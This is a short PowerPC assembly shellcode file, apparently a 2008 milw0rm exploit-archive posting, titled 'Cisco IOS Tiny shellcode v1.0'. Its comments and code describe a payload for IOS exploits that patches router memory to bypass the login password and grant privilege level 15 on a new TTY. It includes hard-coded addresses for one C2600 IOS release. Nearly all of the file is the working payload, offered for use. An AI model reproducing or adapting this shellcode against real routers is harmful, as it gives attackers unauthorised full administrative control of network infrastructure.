1 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 #
3 # Cisco IOS Tiny shellcode v1.0
4 # (c) 2007 IRM Plc
5 # By Gyan Chawdhary
6 #
7 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
8 #
9 # The code creates a new TTY, and sets the privilege level to 15 without a password
10 #
11 # This shellcode can be used as the payload for any IOS exploit on a PowerPC−based device.
12 #
13 #
14 # The following two hard−coded addresses must be located for the target IOS version.
15 #
16 # The hard−coded addresses used here are for:
17 #
18 # IOS (tm) C2600 Software (C2600−IK9S−M), Version 12.3(22), RELEASE SOFTWARE (fc2)
19 #
20 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
21 .equ ret, 0x804a42e8
22 .equ login, 0x8359b1f4
23 .equ god, 0xff100000
24 .equ priv, 0x8359be64
25 # −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
26
27 main:
28
29
# login patch begin
30
lis 9, login@ha
31
la 9, login@l(9)
32
li 8,0
33
stw 8, 0(9)
34
# login patch end
35
36
# priv patch begin
37
lis 9, priv@ha
38
la 9, priv@l(9)
39
lis 8, god@ha
40
la 8, god@l(8)
41
stw 8, 0(9)
42
# priv patch end
43
44
# exit code
45 lis 10, ret@ha
46 addi 4, 10, ret@l
47 mtctr 4
48 bctrl
49
50 # milw0rm.com [2008−08−13]
Page 1/1
Cisco IOS Tiny shellcode v1.0
Gyan Chawdhary
08/13/2008